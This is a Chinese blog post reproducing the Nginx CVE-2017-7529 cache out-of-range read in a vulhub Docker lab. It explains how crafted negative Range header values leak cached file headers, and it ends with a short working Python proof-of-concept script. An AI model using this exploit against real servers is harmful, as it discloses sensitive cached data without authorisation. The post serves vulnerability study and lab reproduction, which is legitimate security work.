Nginx CVE-2017-7529数组越界读取缓存漏洞

最新推荐文章于 2023-10-13 14:15:31 发布
最新推荐文章于 2023-10-13 14:15:31 发布
阅读量320 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: nginx 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/117003093
版权

Nginx CVE-2017-7529数组越界读取缓存漏洞

漏洞原理:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
windows10攻击机192.168.1.120

实验过程

启动漏洞靶机centos8

# 进入vulhub目录
cd /usr/sbin/vulhub/CVE-2017-7529/
# 开启docker服务
service docker start
# 创建docker镜像
docker-compose build
# 启动镜像
docker-compose up -d

尝试访问漏洞页面:

image-20210518203025434

右击菜单栏,点击检查,刷新页面,查看响应头:

image-20210518203109844

可以看出content-length也就是响应体长度为612,cache-control字段值为max-age=0,说明存在缓存。

当max-age>0时,直接从浏览器缓存中提取内容

当max-age=<0时,看缓存是否被修改,若被修改则返回200,若未修改则直接返回缓存内容。

image-20210518211834751

如图所示,max-age=0并且缓存未修改,所以直接返回缓存内容。

这时我们进入镜像,可以查看一下缓存文件:

# 查看docker进程
docker ps
# 进入docker镜像
docker exec -it 镜像id /bin/bash
# 进入缓存文件目录
cd /tmp/nginx/5/77/
# 查看缓存文件
cat 文件名

读取的缓存文件内容如图所示:

image-20210518210311288

尝试用curl命令访问漏洞页面,并返回http响应头,读取响应体的612字节内容:

image-20210518215626638

尝试读取缓存内容,并输出为cache.txt文件。

range在nginx的源码中是64位有符号整型,所以范围是-263~263-1,也就是-9223372036854775808 到 9223372036854775807。

所以范围为-1212到 -9223372036854775808+1212=-9223372036854774596

image-20210518215428194

文件内容如下:

image-20210518215521864

如图所示,成功读取到缓存内容。

上述过程还可以用一个脚本实现:

# -*- coding: UTF-8 -*-
#!/usr/bin/env python

import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://192.168.1.80:8080/ offset"%(sys.argv[0]))
    sys.exit()
    
headers = {}
offset = int(sys.argv[2])
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "byte=-%d,-%d" % (n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
print(headers)
print(r.text)
#python poc.py http://192.168.1.80:8080 612
#一般来说响应体长度为多少,偏移就大致为多少
0ak1ey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nginx越界读取缓存漏洞CVE-2017-7529
haha1314的博客
07-15 1287
Nginx越界读取缓存漏洞CVE-2017-7529漏洞原理 参考阅: https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7 http://galaxylab.org/cve-2017-7529-nginx整数溢出漏洞分析/ Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件...
关于centos7和centos6中平滑升级nginx到新版本v1.12.1修复nginx最新漏洞CVE-2017-7529的解决方案...
reblue520的专栏
07-13 956
关于centos7和centos6中平滑升级nginx到新版本v1.12.1修复CVE-2017-7529漏洞的解决方案 漏洞描述 2017年7月11日,Nginx官方发布最新的安全公告,在Nginx范围过滤器中发现了一个安全问题(CVE-2017-7529),通过精心构造的恶意请求可能会导致整数溢出并且不正确处理范围,从而导致敏感信息泄漏。 当使用Nginx标准模块时,如果文件头...
CVE-2017-7529 Nginx越界读取缓存漏洞
凝聚力安全团队
01-26 4004
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
Nginx 配置错误导致漏洞
来日可期的博客
09-10 2653
Nginx 是一款常用的开源 Web 服务器软件,但在配置过程中可能会出现一些错误,导致潜在的安全漏洞。CRLF注入漏洞,目录穿越漏洞,add_header被覆盖
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容
Nginx range filter模块数字错误漏洞(CVE-2017-7529)解决方法
weixin_34273479的博客
07-28 2009
2019独角兽企业重金招聘Python工程师标准>>> ...
Nginx-Remote-Integer-Overflow-Vulnerability:CVE-2017-7529
04-13
**Nginx远程整数溢出漏洞CVE-2017-7529** 在2017年,Nginx服务器发现了一个严重的安全漏洞,被命名为CVE-2017-7529,它是一个远程整数溢出漏洞。这个漏洞主要影响了Nginx的HTTP模块,允许攻击者通过精心构造的...
struts2-rce:CVE-2017-5638的可利用目标
04-24
CVE-2017-5638的利用演示 完全基于 用法: 前提条件:安装了python,docker,maven和jdk 克隆此仓库 在项目根目录中运行mvn clean软件包 运行docker build -t hack。 运行docker run -d -p 8080:8080 hack ...
nginx-1.13.3,nginx1.13.3不存在信息泄漏漏洞安全稳定nginx版本
10-09
Nginx 1.13.3 中,开发团队对这类漏洞进行了细致的排查和修复,确保用户在使用过程中不会遭遇此类问题。 **2. 稳定性** 稳定性是 Nginx 的核心优势之一。Nginx 1.13.3 版本经过了严格的测试和验证,确保在各种...
nginx-1.23.4安装服务启动
05-03
4. **缓存功能**:Nginx还可以作为缓存服务器,对常见请求提供快速响应,减轻后端服务器压力。 通过以上步骤和理解,您应该能够成功安装和启动Nginx 1.23.4,并了解其作为HTTP服务器和反向代理的基本功能。在实际...
Nginx越界读取缓存漏洞 CVE-2017-7529 漏洞复现
ADummy的博客
02-25 1284
Nginx越界读取缓存漏洞CVE-2017-7529) by ADummy 0x00利用路线 ​ POC验证—>读取缓存文件中位于“http返回包体”前的“文件头”、“http返回包头”等内容 0x01漏洞介绍 ​ Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求
Vulhub中Nginx系列之CVE-2013-4547、CVE-2017-7529、Insecure-configuration、nginx_parsing_vulne 漏洞复现
weixin_41438728的博客
11-30 1350
Nginx系列漏洞复现一、Nginx 文件名逻辑漏洞CVE-2013-4547 )漏洞复现影响版本漏洞说明漏洞利用漏洞修复Nginx越界读取缓存漏洞CVE-2017-7529漏洞复现影响版本漏洞说明概念介绍漏洞利用漏洞修复配置错误导致漏洞(insecure-configuration )影响版本影响说明1、CRLF注入漏洞Mistake 1. CRLF注入漏洞2、目录穿越漏洞3、add_header被覆盖nginx_parsing_vulnerability 一、Nginx 文件名逻辑漏洞CVE-
Vulnhub-GoldenEye  -靶机渗透
嗯嗯呐的博客
11-03 1165
Vulnhub-GoldenEye -靶机渗透 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.入数据 总结 前言 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:root目录下flag.txt文件 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息收集 按照完成靶机后,通过nmap扫描靶机...
nginx越界读取缓存漏洞CVE-2017-7529
u013008898的博客
02-12 698
主要是因为在通过range读取缓存的时候,当我们构造了两个负值得位置,则我们可以读取缓存文件中比敏感的服务器信息。Range: bytes=500- //表示从第 500 字节开始到文件结束部分的内容。Range: bytes=500-999 //表示第 500-999 字节范围的内容。Range: bytes=500-600,601-999 //同时指定几个范围。Range: bytes=-500 // 表示最后 500 字节的内容。在不影响业务的前提下,建议禁用multipart range功能。
vulhub nginx CVE-2017-7529
weixin_37639863的博客
02-19 226
漏洞复现-CVE-2017-7529-敏感信息泄露 - 铺哩 - 博客园Nginx敏感信息泄露漏洞CVE-2017-7529)https://www.cnblogs.com/cute-puli/p/13282355.html poc #!/usr/bin/env python import sys import requests if len(sys.argv) < 2: print("%s url" % (sys.argv[0])) print("eg: py...
CVE-2017-7529:Nginx敏感信息泄露 分析
Endeavour的博客
07-12 2322
2017年7月11日,Nginx官方发布最新的安全公告,漏洞CVE编号为CVE-2017-7529,该在nginx范围过滤器中发现了一个安全问题,通过精心构造的恶意请求可能会导致整数溢出并且不正确处理范围,可能导致敏感信息泄漏,存在安全风险。 具体详情如下: 漏洞编号: CVE-2017-7529 漏洞名称: Nginx敏感信息泄露漏洞 官方评级:
[中间件漏洞]nginx漏洞复现
紫洋的博客
05-26 2032
Nginx的处理程序和FastCGI处理程序不同导致 Nginx拿到URI为/1.jpg/xxx.php后,识别处后缀是.php,认为是php文件,转交给PHP FastCGI处理程序去处理。PHP FastCGI处理程序识别该URI: /1.jpg/xxx.php不存在,按照PHP FastCGI处理程序自己 的规则,删去最后的/xxx.php,又看/1.jpg存在,就将/1.jpg当成要执行的文件,就成功解析。在路径后增加/test.php 并访问,发现图片已经被解析成为php文件。
CVE-2017-7529 Nginx越界读取内存漏洞
最新发布
mirocky的博客
10-13 636
CVE-2017-7529漏洞复现
nginx cve-2022-41742 修复
08-05
对于 NginxCVE-2022-41742 的修复,我可以提供一些建议。请注意,以下建议仅供参考,并且可能需要根据您的具体环境和需求进行调整。 1. 升级 Nginx 版本:首先,确保您的 Nginx 版本是最新的稳定版本。访问 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值